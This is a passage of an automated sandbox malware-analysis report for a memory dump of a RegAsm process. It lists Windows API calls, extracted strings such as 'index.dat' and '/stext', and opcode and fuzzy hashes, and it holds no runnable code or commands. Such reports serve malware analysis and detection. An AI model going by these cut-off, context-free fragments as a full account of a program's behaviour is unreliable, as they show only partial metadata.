                                                                                                                                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 839530781-0
                                                                                                                                                                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                      • String ID: *.*$index.dat
                                                                                                                                                                      • API String ID: 1974802433-2863569691
                                                                                                                                                                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3397143404-0
                                                                                                                                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1125800050-0
                                                                                                                                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleSleep
                                                                                                                                                                      • String ID: }A
                                                                                                                                                                      • API String ID: 252777609-2138825249
                                                                                                                                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                      APIs
                                                                                                                                                                      • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                      • free.MSVCRT ref: 00409A31
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3056473165-0
                                                                                                                                                                      • Opcode ID: 0b948c499b3449ea39a97f62b454048eb940a9f441a9691fc400a1ab51a84e12
                                                                                                                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b948c499b3449ea39a97f62b454048eb940a9f441a9691fc400a1ab51a84e12
                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: d
                                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                                      • Opcode ID: 2ea43a84bbc6b9850be7b521930e14c731786dace660299f5d5fb6de9ff2c6ec
                                                                                                                                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ea43a84bbc6b9850be7b521930e14c731786dace660299f5d5fb6de9ff2c6ec
                                                                                                                                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset
                                                                                                                                                                      • String ID: BINARY
                                                                                                                                                                      • API String ID: 2221118986-907554435
                                                                                                                                                                      • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                      • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 568699880-0
                                                                                                                                                                      • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                      • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                                                      • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                      • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                      • API String ID: 2081463915-3817206916
                                                                                                                                                                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1023896661-0
                                                                                                                                                                      • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                      • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                                                      • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2445788494-0
                                                                                                                                                                      • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                      • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                                                                                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcmpmemset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1065087418-0
                                                                                                                                                                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1381354015-0
                                                                                                                                                                      • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                      • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                      • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                                                      • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                      • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2154303073-0
                                                                                                                                                                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4232544981-0
                                                                                                                                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                      APIs
                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
